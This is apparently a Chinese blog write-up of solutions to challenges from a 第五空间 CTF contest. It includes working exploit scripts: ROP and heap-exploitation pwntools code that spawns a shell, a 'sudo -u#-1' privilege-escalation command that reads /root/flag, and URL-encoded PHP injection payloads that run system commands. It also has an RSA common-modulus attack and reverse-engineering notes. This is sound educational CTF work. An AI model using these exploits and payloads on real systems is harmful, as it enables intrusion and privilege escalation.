第五空间6月24日比赛的部分WP.
目录rsa共模攻击,网上找了个板子改了改
rom gmpy2 import *
import libnum
n = 0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121db31db9ee1bf9f26023182acce8f84612bfeb075803cf610f27b7b16147f7d29cc3fd463df7ea31ca860d59aae5506479c76206603de54044e7b778e21082c4c4da795d39dc2b9c0589e577a773133c89fa8e3a4bd047b8e7d6da0d9a0d8a3c1a3607ce983deb350e1c649725cccb0e9d756fc3107dd4352aa18c45a65bab7772a4c5aef7020a1e67e6085cc125d9fc042d96489a08d885f448ece8f7f254067dfff0c4e72a63557
e1 = 0xf4c1158f
c1 = 0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707
e2 = 0xf493f7d1
c2 = 0xd32dfad68d790022758d155f2d8bf46bb762ae5cc17281f2f3a8794575ec684819690b22106c1cdaea06abaf7d0dbf841ebd152be51528338d1da8a78f666e0da85367ee8c1e6addbf590fc15f1b2182972dcbe4bbe8ad359b7d15febd5597f5a87fa4c6c51ac4021af60aeb726a3dc7689daed70144db57d1913a4dc29a2b2ec34c99c507d0856d6bf5d5d01ee514d47c7477a7fb8a6747337e7caf2d6537183c20e14c7b79380d9f7bcd7cda9e3bfb00c2b57822663c9a5a24927bceec316c8ffc59ab3bfc19f364033da038a4fb3ecef3b4cb299f4b600f76b8a518b25b576f745412fe53d229e77e68380397eee6ffbc36f6cc734815cd4065dc73dcbcb
s = gcdext(e1, e2)
s1 = s[1]
s2 = -s[2]
c2 = invert(c2, n)
m = (pow(c1,s1,n) * pow(c2 , s2 , n)) % n
print(hex(m))
s=hex(m)[2:]
result=""
for i in range(len(s)/2):
result+=chr(int(s[2*i:2*i+2],16))
print(result[:-64])
# g0od_go0d_stu4y_d4yd4y_Up
main函数里存在三个需要nop的反调试的函数(共五处),nop后的逻辑是:输入数字,然后通过eax一直加(大约是反调试jump的次数)+0xCCCCCCCC,最后的值用于在函数sub_8048691中patch eax和eax+1的值为0x90。因此正确的patch才能跳转到right处,由于中间eax+1有点多不想数b,所以大概算了个值(考虑一下32位溢出),然后前后遍历了一小段数字,得到flag为99357990
本意是一个rop导向的逆向题,但写trace太麻烦了,所以试了下angr的模板,正好可以用,注意一下输入参数为argv1
import angr
import sys
import claripy
def main(filepath):
project = angr.Project(filepath)
argv1 = claripy.BVS("argv1",100*8)
init_state = project.factory.entry_state(args=[filepath,argv1])
sim = project.factory.simgr(init_state)
find = [0x400481]
avoid = [0x400471]
sim.explore(find=find,avoid=avoid)
if sim.found:
found=sim.found[0]
solution = found.solver.eval(argv1, cast_to=bytes)
print(solution)
else:
raise Exception('Could not find the solution')
if __name__=="__main__":
if(len(sys.argv)!=2):
print('usage:python angr_basic.py filepath')
filepath = sys.argv[1]
main(filepath)
# ctf{ropchain_is_g00d}
第一次溢出一个字节用于泄露canary和栈地址,第二次溢出0x20字节,其中除了填写canary外,rbp位置存放字符串起始栈地址-8,返回地址填leave ret,这样就可以多出88字节的ROP。ROP主体为puts泄露libc地址、read往bss(也可以继续往栈上)写入system("/bin/sh\x00")的另一段ROP,最后栈转移,正好`88字节。
from pwn import *
from LibcSearcher import LibcSearcher
e = ELF("./pwn")
libc = e.libc
if args.I:
context.log_level = 'debug'
if args.R:
p = remote('121.36.59.116', 9999)
else:
p = process(e.path) #, env = {'LD_PRELOAD': LIBC})
p.sendafter(">", "A"*89)
p.recvuntil("A"*89)
canary = u64(p.recv(7).rjust(8, b'\0'))
stack = u64(p.recv(6).ljust(8, b'\0'))
print(hex(canary))
print(hex(stack))
p.recvuntil(">")
pop_rdi_ret = 0x400923
pop_rsi_r15_ret = 0x400921
pop_rsp_13_14_15_ret = 0x40091d
leave_ret = 0x400879
bss = 0x601400
payload = p64(pop_rdi_ret)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(pop_rsi_r15_ret)
payload += p64(bss)
payload += p64(0)
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(e.plt['read'])
payload += p64(pop_rsp_13_14_15_ret)
payload += p64(bss)
print(len(payload))
p.send(payload+p64(canary)+p64(stack-0x18-88-8)+p64(leave_ret))
p.recvline()
puts_addr = u64(p.recv(6).ljust(8, b'\0'))
print(hex(puts_addr))
libcsearch = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libcsearch.dump('puts')
system_addr = libcbase + libcsearch.dump('system')
binsh_addr = libcbase + libcsearch.dump('str_bin_sh')
p.send(p64(0)*3+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr))
# print(p.pid)
p.interactive()
运行实例:
p.interactive()
pwnme因为除了off-one-null-byte外更严重的是有任意长度堆溢出的操作,一开始想的是使用overlapping,但因为环境一直搭不起来拿不到unsortedbin的偏移,又看到没开PIE并且GOT表可写,所以最后换了unlink来做。unlink后泄露free地址再填入system地址一把梭。
from pwn import *
from LibcSearcher import LibcSearcher
e = ELF("./a.out")
libc = ELF("./lib/libuClibc-1.0.34.so")
# libc = e.libc
if args.I:
context.log_level = 'debug'
if args.R:
p = remote('121.36.58.215', 1337)
else:
p = process(e.path) #, env = {'LD_PRELOAD': LIBC})
def Show():
p.sendlineafter(">>> ", '1')
def Add(lenth, tag):
p.sendlineafter(">>> ", '2')
p.sendlineafter("Length:", str(lenth))
p.sendafter("Tag:", tag)
def Change(ind, lenth, tag):
p.sendlineafter(">>> ", '3')
p.sendlineafter("Index:", str(ind))
p.sendlineafter("Length:", str(lenth))
p.sendafter("Tag:", tag)
def Remove(ind):
p.sendlineafter(">>> ", '4')
p.sendlineafter("Tag:", str(ind))
chunk = 0x21068
ptr = chunk+4+8
Add(0x50, 'yuri') # 0
Add(0x100, 'yuri') # 1
Add(0xf8, 'yuri') # 2
Add(0x50, '/bin/sh\x00') # 3
Change(1, 0x100+4, b'\0'*8 + p32(ptr-3*4) + p32(ptr-2*4) + b'\0'*240 + p32(0x108-2*4))
Remove(2)
Change(1, 7, p32(0x50) + p32(e.got['free'])[:-1])
Show()
p.recvuntil(" : ")
base = u32(p.recv(4)) - libc.symbols['free']
Change(0, 4, p32(base + libc.symbols['system']))
Remove(3)
# print(p.pid)
p.interactive()
只给源码的pwn,先把tcache填满使得后续堆块释放到fastbin,然后利用scanf触发malloc_consolidate释放到unsortedbin泄露libc地址,最后便是常规改__free_hook的操作。这里比较奇怪的是泄露的unsortedbin的地址多了0x100,第一次见这种操作。
from pwn import *
from LibcSearcher import LibcSearcher
# e = ELF("./pwn")
libc = ELF("./libc-2.27.so")
if args.I:
context.log_level = 'debug'
r = remote('121.36.74.70', 9999)
def allocate(ind):
r.sendlineafter("Your choice: ", "1")
r.sendlineafter("Index: ", str(ind))
def delete(ind):
r.sendlineafter("Your choice: ", "4")
r.sendlineafter("Index: ", str(ind))
def show(ind):
r.sendlineafter("Your choice: ", "3")
r.sendlineafter("Index: ", str(ind))
r.recvuntil("Content: ")
return r.recv(0x100-8)
def edit(ind, content):
r.sendlineafter("Your choice: ", "2")
r.sendlineafter("Index: ", str(ind))
r.sendafter("Content: ", content)
for i in range(7):
allocate(i)
allocate(7)
allocate(8)
for i in range(7):
delete(i)
delete(7)
for i in range(7):
allocate(i)
allocate(9) # 7 == 9
for i in range(7):
delete(i)
delete(7)
r.sendlineafter("Your choice: ", '7'*0x500)
base = u64(show(9)[:8]) - 96 - 0x10 - libc.symbols['__malloc_hook'] - 0x100
free_hook_addr = base + libc.symbols['__free_hook']
system_addr = base + libc.symbols['system']
print(hex(base))
for i in range(7):
allocate(i)
allocate(7)
delete(7)
edit(9, p64(free_hook_addr-8))
allocate(10)
allocate(10)
edit(10, b'/bin/sh\x00' + p64(system_addr))
delete(10)
r.interactive()
flag{https://5space.360.cn}
麒麟系统提权root权限,访问/root/flag,获取内容
user:kylin-user pwd:FifthSpace360
118.26.139.133:22IP地址更换118.26.139.133:22
sudo配置不当可以以root权限执行
sudo -u#-1 cat /root/flag
looptar和zip循环解压,用下面的脚本跑五六次差不多能拿到flag的文件
import os
for i in range(100):
os.system('tar -xvf tarfile')
os.system('unzip -o zipfile')
# flag{a4944cc1-0e50-44d3-9d85-6c52a3387330}
一开始打算当作逆向来做,但使用DIE看时发现资源区段显示加壳,很可疑。
查看资源区段,果然有FL4G字样。
因此直接用Resource Hacker查看,发现非常明显的PNG结构特征。
提出来改一下PNG头前四个字节即可看到FLAG。
很大的run.exe,win10桌面显示是个word,想起来word本来也是压缩包,解压了一下拿到一个word和一个小的run.exe,跑了一下发现出来一个tif文件改了后缀以后用ps打开,黑色块可以移动,移开后得到
而tif文件的最后有run.exe加上的run->njCp1HJBPLVTxcMhUHDPwE7mPW,因此试了下有无flag{}``,有无run->`,最后正确的是
s="flag{njCp1HJBPLVTxcMhUHDPwE7mPW}"
s=list(s)
for i in range(len(s)):
if(i%2==0):
s[i]=chr(ord(s[i])+1)
else:
s[i]=chr(ord(s[i])-1)
print("".join(s))
# flag{njCp1HJBPLVTxcMhUHDPwE7mPW}
没有过滤 ()~直接用取反,unicode字符用url编码
phpinfo验证
http://121.36.74.163/?code=(~%8F%97%8F%96%91%99%90)()
system('cat flag.php')
(system)('cat /flag.php')
php > $a = "system";
php > echo urlencode(~$a);
%8C%86%8C%8B%9A%92
php > $a = "cat /flag.php";
php > echo urlencode(~$a);
%9C%9E%8B%DF%D0%99%93%9E%98%D1%8F%97%8F
(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)
关注
打赏
![]()
1665306545
查看更多评论
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
立即登录/注册
微信扫码登录